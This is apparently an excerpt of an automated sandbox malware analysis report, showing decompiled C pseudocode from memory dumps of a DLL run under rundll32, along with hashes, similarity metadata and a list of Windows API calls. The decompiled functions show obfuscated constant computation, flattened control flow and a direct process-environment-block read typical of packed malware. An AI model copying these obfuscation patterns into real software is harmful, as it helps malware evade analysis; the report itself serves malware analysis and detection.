                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _t83;
                                                                                                                      				void* _t88;
                                                                                                                      
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v48 = 0xd3138f;
                                                                                                                      				_v44 = 0xbafb06;
                                                                                                                      				_v40 = 0xb4c902;
                                                                                                                      				_v28 = 0x9a00a8;
                                                                                                                      				_v28 = _v28 + 0xffff4980;
                                                                                                                      				_v28 = _v28 + 0xffff4b07;
                                                                                                                      				_v28 = _v28 ^ 0x00989527;
                                                                                                                      				_v12 = 0x37fcba;
                                                                                                                      				_v12 = _v12 + 0xffff1054;
                                                                                                                      				_v12 = _v12 ^ 0xaae49dfe;
                                                                                                                      				_v12 = _v12 | 0x5520ddcc;
                                                                                                                      				_v12 = _v12 ^ 0xfff3c0c4;
                                                                                                                      				_v8 = 0xafb0cb;
                                                                                                                      				_t88 = __ecx;
                                                                                                                      				_t83 = 0x7b;
                                                                                                                      				_v8 = _v8 / _t83;
                                                                                                                      				_v8 = _v8 << 0xb;
                                                                                                                      				_v8 = _v8 + 0xffff2cb4;
                                                                                                                      				_v8 = _v8 ^ 0x0b6cc095;
                                                                                                                      				_v24 = 0x7eb81c;
                                                                                                                      				_v24 = _v24 | 0x606632c5;
                                                                                                                      				_v24 = _v24 + 0x73a0;
                                                                                                                      				_v24 = _v24 * 0x3c;
                                                                                                                      				_v24 = _v24 ^ 0x9dca2ad3;
                                                                                                                      				_v20 = 0x11602;
                                                                                                                      				_v20 = _v20 * 0x5d;
                                                                                                                      				_v20 = _v20 + 0xd70f;
                                                                                                                      				_v20 = _v20 + 0x91d0;
                                                                                                                      				_v20 = _v20 ^ 0x006b4c23;
                                                                                                                      				_v32 = 0x7d7f;
                                                                                                                      				_v32 = _v32 + 0x7879;
                                                                                                                      				_v32 = _v32 ^ 0x000fb411;
                                                                                                                      				_v16 = 0xa8b2e1;
                                                                                                                      				_v16 = _v16 >> 0xf;
                                                                                                                      				_v16 = _v16 + 0xffff543c;
                                                                                                                      				_v16 = _v16 ^ 0xd60d7738;
                                                                                                                      				_v16 = _v16 ^ 0x29f40b7c;
                                                                                                                      				return E00177A47(_v28, _v24, _v20, E00185BB3(), _t88, _v32, _v16);
                                                                                                                      			}

















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #Lk
                                                                                                                      • API String ID: 0-1139186034
                                                                                                                      • Opcode ID: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction ID: 2bd8adb0fdbbe258e697774c4166b324dc99057942f906292a36b343b0bb04a4
                                                                                                                      • Opcode Fuzzy Hash: 113ec85c3a59fd735fa232de4a646e64cc00cec35d4fe763381d1135a8ddbe7c
                                                                                                                      • Instruction Fuzzy Hash: 0831CDB1C0131EABCB58CFA5C94A1EEBBB5FF14318F208188D515B6260D3B91B45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E0017FD8C() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				unsigned int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				short _t136;
                                                                                                                      				short _t138;
                                                                                                                      				signed int _t141;
                                                                                                                      				signed int _t144;
                                                                                                                      				void* _t145;
                                                                                                                      				void* _t146;
                                                                                                                      				intOrPtr _t164;
                                                                                                                      				void* _t165;
                                                                                                                      				short* _t166;
                                                                                                                      				short* _t167;
                                                                                                                      				void* _t168;
                                                                                                                      				short* _t169;
                                                                                                                      				signed int _t170;
                                                                                                                      				signed int _t171;
                                                                                                                      				signed int _t172;
                                                                                                                      				signed int _t173;
                                                                                                                      				void* _t174;
                                                                                                                      
                                                                                                                      				_t164 =  *0x19520c; // 0x0
                                                                                                                      				_v8 = 0xafc848;
                                                                                                                      				_t165 = _t164 + 0x220;
                                                                                                                      				_t146 = 0xaad6b4c;
                                                                                                                      				_t170 = 0xc;
                                                                                                                      				_v8 = _v8 / _t170;
                                                                                                                      				_v8 = _v8 ^ 0xeddef8c6;
                                                                                                                      				_v8 = _v8 >> 4;
                                                                                                                      				_v8 = _v8 ^ 0x0edbb261;
                                                                                                                      				_v16 = 0xa05fce;
                                                                                                                      				_v16 = _v16 + 0x102e;
                                                                                                                      				_v16 = _v16 + 0x8702;
                                                                                                                      				_v16 = _v16 ^ 0x00a5637b;
                                                                                                                      				_v48 = 0xdd0656;
                                                                                                                      				_v48 = _v48 >> 2;
                                                                                                                      				_v48 = _v48 ^ 0x00330133;
                                                                                                                      				_v24 = 0x8dacbc;
                                                                                                                      				_t144 = 0x5c;
                                                                                                                      				_t171 = 0x3d;
                                                                                                                      				_v24 = _v24 * 0x19;
                                                                                                                      				_v24 = _v24 / _t144;
                                                                                                                      				_v24 = _v24 ^ 0x00283487;
                                                                                                                      				_v20 = 0x519264;
                                                                                                                      				_t145 = 2;
                                                                                                                      				_v20 = _v20 * 0x67;
                                                                                                                      				_v20 = _v20 << 1;
                                                                                                                      				_v20 = _v20 ^ 0x41a5f983;
                                                                                                                      				_v32 = 0xc0edbc;
                                                                                                                      				_v32 = _v32 * 0x1e;
                                                                                                                      				_v32 = _v32 << 0x10;
                                                                                                                      				_v32 = _v32 ^ 0xdc023425;
                                                                                                                      				_v28 = 0xb6ecb7;
                                                                                                                      				_v28 = _v28 * 0x1e;
                                                                                                                      				_v28 = _v28 + 0x349f;
                                                                                                                      				_v28 = _v28 ^ 0x156255f9;
                                                                                                                      				_v36 = 0x8be990;
                                                                                                                      				_v36 = _v36 | 0x6444358b;
                                                                                                                      				_v36 = _v36 * 0x59;
                                                                                                                      				_v36 = _v36 ^ 0x0c402a41;
                                                                                                                      				_v52 = 0xcdd122;
                                                                                                                      				_v52 = _v52 ^ 0xde2c2ef8;
                                                                                                                      				_v52 = _v52 ^ 0xdee78ce8;
                                                                                                                      				_v40 = 0xa1b7cb;
                                                                                                                      				_v40 = _v40 ^ 0x66c9ba9b;
                                                                                                                      				_v40 = _v40 + 0xffffb195;
                                                                                                                      				_v40 = _v40 ^ 0x666fdaad;
                                                                                                                      				_v56 = 0x9437d4;
                                                                                                                      				_v56 = _v56 / _t171;
                                                                                                                      				_v56 = _v56 ^ 0x00087e9b;
                                                                                                                      				_v12 = 0x6793e4;
                                                                                                                      				_v12 = _v12 << 2;
                                                                                                                      				_v12 = _v12 >> 8;
                                                                                                                      				_v12 = _v12 << 3;
                                                                                                                      				_v12 = _v12 ^ 0x000c2cdf;
                                                                                                                      				_v44 = 0x8cb917;
                                                                                                                      				_v44 = _v44 >> 0xf;
                                                                                                                      				_v44 = _v44 << 6;
                                                                                                                      				_v44 = _v44 ^ 0x00016464;
                                                                                                                      				do {
                                                                                                                      					while(_t146 != 0xa09253) {
                                                                                                                      						if(_t146 == 0x53e5fac) {
                                                                                                                      							_t172 = E0017EF71(4, 0x10);
                                                                                                                      							_push(_t172);
                                                                                                                      							_push(_v56);
                                                                                                                      							_push(_t165);
                                                                                                                      							E00175A07(1, _v40);
                                                                                                                      							_t174 = _t174 + 0x14;
                                                                                                                      							_t167 = _t165 + _t172 * 2;
                                                                                                                      							_t146 = 0xa09253;
                                                                                                                      							_t136 = 0x2e;
                                                                                                                      							 *_t167 = _t136;
                                                                                                                      							_t165 = _t167 + _t145;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t146 == 0xaad6b4c) {
                                                                                                                      								_t138 = E00175AE2(_t146);
                                                                                                                      								_t146 = 0xd305119;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t146 == 0xd305119) {
                                                                                                                      									_t141 = E0017EF71(4, 0x10);
                                                                                                                      									_push(1);
                                                                                                                      									_push(_v20);
                                                                                                                      									_push(_t165);
                                                                                                                      									_t173 = _t141;
                                                                                                                      									E00175A07(_t145, _v24);
                                                                                                                      									_push(_t173);
                                                                                                                      									_push(_v28);
                                                                                                                      									_t168 = _t165 + _t145;
                                                                                                                      									_push(_t168);
                                                                                                                      									E00175A07(1, _v32);
                                                                                                                      									_t174 = _t174 + 0x20;
                                                                                                                      									_t169 = _t168 + _t173 * 2;
                                                                                                                      									_t146 = 0x53e5fac;
                                                                                                                      									_t138 = 0x5c;
                                                                                                                      									 *_t169 = _t138;
                                                                                                                      									_t165 = _t169 + _t145;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					_push(3);
                                                                                                                      					_push(_v44);
                                                                                                                      					_push(_t165);
                                                                                                                      					E00175A07(1, _v12);
                                                                                                                      					_t166 = _t165 + 6;
                                                                                                                      					_t174 = _t174 + 0xc;
                                                                                                                      					_t146 = 0xc2dacde;
                                                                                                                      					 *_t166 = 0;
                                                                                                                      					_t165 = _t166 + _t145;
                                                                                                                      					L9:
                                                                                                                      				} while (_t146 != 0xc2dacde);
                                                                                                                      				return _t138;
                                                                                                                      			}


































                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e1437f762ded743c4eaa28960bede06ad194c179e7b03f47ccb61cd84c5c8ac1
                                                                                                                      • Instruction ID: bb29131ccd6ec5376ea6537a7c4faa6074d1cec406285f9b1780ff89ab6ff776
                                                                                                                      • Opcode Fuzzy Hash: e1437f762ded743c4eaa28960bede06ad194c179e7b03f47ccb61cd84c5c8ac1
                                                                                                                      • Instruction Fuzzy Hash: 50615775D01209ABDB08DFA4C88A9EEFBB1FF44314F208159E216BB290D7B51A45CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 82%
                                                                                                                      			E0018E498(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				void* _v68;
                                                                                                                      				intOrPtr _v72;
                                                                                                                      				char _v592;
                                                                                                                      				void* _t122;
                                                                                                                      				signed int _t137;
                                                                                                                      				signed int _t138;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t122);
                                                                                                                      				_v72 = 0xec580c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_t137 = 0x76;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_v48 = 0xa71dc1;
                                                                                                                      				_v48 = _v48 << 0x10;
                                                                                                                      				_v48 = _v48 ^ 0x1dc99f4e;
                                                                                                                      				_v8 = 0x906d24;
                                                                                                                      				_v8 = _v8 | 0x748f1c77;
                                                                                                                      				_v8 = _v8 + 0xffff13d2;
                                                                                                                      				_v8 = _v8 * 0x4a;
                                                                                                                      				_v8 = _v8 ^ 0xb5d1b34d;
                                                                                                                      				_v32 = 0x99e404;
                                                                                                                      				_v32 = _v32 ^ 0xe9d0d5f4;
                                                                                                                      				_v32 = _v32 + 0x5a31;
                                                                                                                      				_v32 = _v32 ^ 0xe94bd9b5;
                                                                                                                      				_v16 = 0xd98a19;
                                                                                                                      				_v16 = _v16 + 0xffff99bf;
                                                                                                                      				_v16 = _v16 + 0x1a5b;
                                                                                                                      				_v16 = _v16 << 0xa;
                                                                                                                      				_v16 = _v16 ^ 0x64f05351;
                                                                                                                      				_v40 = 0x441d8c;
                                                                                                                      				_v40 = _v40 + 0xbe9c;
                                                                                                                      				_t138 = 0x7a;
                                                                                                                      				_v40 = _v40 / _t137;
                                                                                                                      				_v40 = _v40 ^ 0x00086b18;
                                                                                                                      				_v20 = 0xfc7ad5;
                                                                                                                      				_v20 = _v20 + 0x78e5;
                                                                                                                      				_v20 = _v20 + 0xffff6dfc;
                                                                                                                      				_v20 = _v20 + 0xa8d2;
                                                                                                                      				_v20 = _v20 ^ 0x00f25a11;
                                                                                                                      				_v44 = 0xb09661;
                                                                                                                      				_v44 = _v44 << 2;
                                                                                                                      				_v44 = _v44 + 0x5c70;
                                                                                                                      				_v44 = _v44 ^ 0x02c80175;
                                                                                                                      				_v12 = 0xc44555;
                                                                                                                      				_v12 = _v12 | 0x8aaf582b;
                                                                                                                      				_v12 = _v12 >> 3;
                                                                                                                      				_v12 = _v12 ^ 0x8e0d3178;
                                                                                                                      				_v12 = _v12 ^ 0x9f5e57b0;
                                                                                                                      				_v36 = 0x15e160;
                                                                                                                      				_v36 = _v36 << 7;
                                                                                                                      				_v36 = _v36 * 0x45;
                                                                                                                      				_v36 = _v36 ^ 0xf2df9ca5;
                                                                                                                      				_v24 = 0xe11875;
                                                                                                                      				_v24 = _v24 + 0xffffa15f;
                                                                                                                      				_v24 = _v24 / _t138;
                                                                                                                      				_v24 = _v24 ^ 0x000fcfe6;
                                                                                                                      				_v56 = 0xedc19c;
                                                                                                                      				_v56 = _v56 | 0x5ad96a0a;
                                                                                                                      				_v56 = _v56 ^ 0x5af69f46;
                                                                                                                      				_v52 = 0x112c39;
                                                                                                                      				_v52 = _v52 << 3;
                                                                                                                      				_v52 = _v52 ^ 0x00831cf8;
                                                                                                                      				_v28 = 0xaa6b89;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_v28 = _v28 + 0xffff7c23;
                                                                                                                      				_v28 = _v28 ^ 0x00029c7f;
                                                                                                                      				_push(_v16);
                                                                                                                      				_push(_v32);
                                                                                                                      				_push(0x1712a4);
                                                                                                                      				E00173BF8(_v20, _v28, E0017AB66(_v48, _v8, _v28), _v44, _v12,  &_v592, _a8);
                                                                                                                      				E0017AE03(_v36, _v24, _v56, _t131);
                                                                                                                      				return E0017BAB0( &_v592, _v52, _v28);
                                                                                                                      			}























                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3ad7b2180658afa6c34edebf7f19fca63a8f6d5b34160e4f4caaaad06a34eaad
                                                                                                                      • Instruction ID: f3738f2b60bbe2386af911e70b959df76fe3fb98c6c6dc7af5ac73e74ad5b838
                                                                                                                      • Opcode Fuzzy Hash: 3ad7b2180658afa6c34edebf7f19fca63a8f6d5b34160e4f4caaaad06a34eaad
                                                                                                                      • Instruction Fuzzy Hash: 7D5112B2D0130DEBCF04DFA5C94A8DEBBB2FB58314F208198E41576260D7B91A09CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E001768DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				unsigned int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t87;
                                                                                                                      				signed int _t99;
                                                                                                                      				signed int _t100;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0017CF25(_t87);
                                                                                                                      				_v8 = 0x73b8de;
                                                                                                                      				_v8 = _v8 ^ 0x19054fb7;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 + 0x3490;
                                                                                                                      				_v8 = _v8 ^ 0xdee55d26;
                                                                                                                      				_v20 = 0xe646cf;
                                                                                                                      				_v20 = _v20 >> 0xb;
                                                                                                                      				_v20 = _v20 ^ 0x0000515e;
                                                                                                                      				_v16 = 0xc8864d;
                                                                                                                      				_v16 = _v16 >> 7;
                                                                                                                      				_v16 = _v16 + 0xffff7ea5;
                                                                                                                      				_v16 = _v16 >> 1;
                                                                                                                      				_v16 = _v16 ^ 0x000d0f10;
                                                                                                                      				_v16 = 0xf76b6b;
                                                                                                                      				_v16 = _v16 + 0xffff8d96;
                                                                                                                      				_v16 = _v16 + 0xa530;
                                                                                                                      				_v16 = _v16 ^ 0x00f3b26e;
                                                                                                                      				_v28 = 0xad3635;
                                                                                                                      				_v28 = _v28 << 4;
                                                                                                                      				_v28 = _v28 ^ 0x0ad12e90;
                                                                                                                      				_v28 = 0xa7b230;
                                                                                                                      				_t99 = 0x21;
                                                                                                                      				_v28 = _v28 * 0x16;
                                                                                                                      				_v28 = _v28 ^ 0x0e6a6f58;
                                                                                                                      				_v28 = 0xa141da;
                                                                                                                      				_v28 = _v28 / _t99;
                                                                                                                      				_v28 = _v28 ^ 0x0004c009;
                                                                                                                      				_v16 = 0x3b52c9;
                                                                                                                      				_t100 = 0x69;
                                                                                                                      				_v16 = _v16 / _t100;
                                                                                                                      				_v16 = _v16 | 0xd3b68a53;
                                                                                                                      				_v16 = _v16 + 0xffff1b94;
                                                                                                                      				_v16 = _v16 ^ 0xd3beae71;
                                                                                                                      				_v12 = 0xce562d;
                                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                                      				_v12 = _v12 << 0x10;
                                                                                                                      				_v12 = _v12 + 0xffff0c4b;
                                                                                                                      				_v12 = _v12 ^ 0xfffd1cdf;
                                                                                                                      				_v24 = 0x109fa9;
                                                                                                                      				_v24 = _v24 >> 8;
                                                                                                                      				_v24 = _v24 ^ 0x0002830d;
                                                                                                                      				return E001840F4(_v28, _v16, _a12, _v12, _v24, E00185BB3());
                                                                                                                      			}













                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction ID: 4fbffea0d203ecc346c5694321e2be9f4c8cf795866d52f83ef7eaf1a90515bd
                                                                                                                      • Opcode Fuzzy Hash: d2a8de53734b9d3901bc94b6b25c32e81bc309cda1bfd67e32ed41b72a8c3f3f
                                                                                                                      • Instruction Fuzzy Hash: 0A31B0B6C0160EEBDF45DFA5D84A4EEBBB2AB10308F208599E611A6251D3B55B548F80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0018D374() {
                                                                                                                      
                                                                                                                      				return  *[fs:0x30];
                                                                                                                      			}



                                                                                                                      0x0018d37a

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                      • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                      • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      • GetVersion.KERNEL32 ref: 10014EC3
